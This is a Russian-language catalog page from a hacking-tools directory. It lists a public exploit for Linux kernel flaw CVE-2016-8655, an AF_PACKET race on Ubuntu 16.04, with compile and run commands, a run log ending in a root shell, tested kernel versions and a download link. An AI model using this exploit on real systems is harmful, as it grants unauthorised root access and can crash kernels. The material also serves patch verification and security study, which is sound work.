Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2016-8655 — Эксплойт локального повышения привилегий для ядра Linux CVE-2016-8655, нацеленный на состояние гонки в AF_PACKET на Ubuntu 16.04 x86_64 для получения root-оболочки через манипуляцию памятью. | Kitploit
Инструменты/GitHubGitHub/lakshmidesai/cve-2016-8655
Повышение привилегийАнализ уязвимостейЭксплуатацияЭксплуатация Бинарных Файлов
GitHublakshmidesai/cve-2016-8655

CVE-2016-8655

Эксплойт локального повышения привилегий для ядра Linux CVE-2016-8655, нацеленный на состояние гонки в AF_PACKET на Ubuntu 16.04 x86_64 для получения root-оболочки через манипуляцию памятью.

Репозиторий
5439 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

ocobo_root.c эксплуатация состояния гонки AF_PACKET в Linux эксплойт для Ubuntu 16.04 x86_64

user@ubuntu:$ gcc chocobo_root.c -o chocobo_root -lpthread user@ubuntu:$ ./chocobo_root

making vsyscall page writable..

new exploit attempt starting, jumping to 0xffffffff8106f320, arg=0xffffffffff600000 sockets allocated removing barrier and spraying.. version switcher stopping, x = -1 (y = 174222, last val = 2) current packet version = 0 pbd->hdr.bh1.offset_to_first_pkt = 48 === TPACKET_V1 && offset_to_first_pkt != 0, race won === please wait up to a few minutes for timer to be executed. if you ctrl-c now the kernel will hang. so don't do that. closing socket and verifying....... vsyscall page altered!

stage 1 completed registering new sysctl..

new exploit attempt starting, jumping to 0xffffffff812879a0, arg=0xffffffffff600850 sockets allocated removing barrier and spraying.. version switcher stopping, x = -1 (y = 30773, last val = 0) current packet version = 2 pbd->hdr.bh1.offset_to_first_pkt = 48 race not won

retrying stage.. new exploit attempt starting, jumping to 0xffffffff812879a0, arg=0xffffffffff600850 sockets allocated removing barrier and spraying.. version switcher stopping, x = -1 (y = 133577, last val = 2) current packet version = 0 pbd->hdr.bh1.offset_to_first_pkt = 48 === TPACKET_V1 && offset_to_first_pkt != 0, race won === please wait up to a few minutes for timer to be executed. if you ctrl-c now the kernel will hang. so don't do that. closing socket and verifying....... sysctl added!

stage 2 completed binary executed by kernel, launching rootshell root@ubuntu:~# id uid=0(root) gid=0(root) groups=0(root),1000(user)

==============================*=

Включены смещения для старых ядер, но они не проверены, поэтому имейте в виду, что этот эксплойт, вероятно, вызовет сбой ядер старше 4.4.

протестировано на: Ubuntu 16.04: 4.4.0-51-generic Ubuntu 16.04: 4.4.0-47-generic Ubuntu 16.04: 4.4.0-36-generic Ubuntu 14.04: 4.4.0-47-generic #68~14.04.1-Ubuntu

Благодарности: jsc за вдохновение (https://www.youtube.com/watch?v=x4UDIfcYMKI) mcdelivery за доставку горячих пирожков и кофе

11/2016 от rebel

Скачать инструмент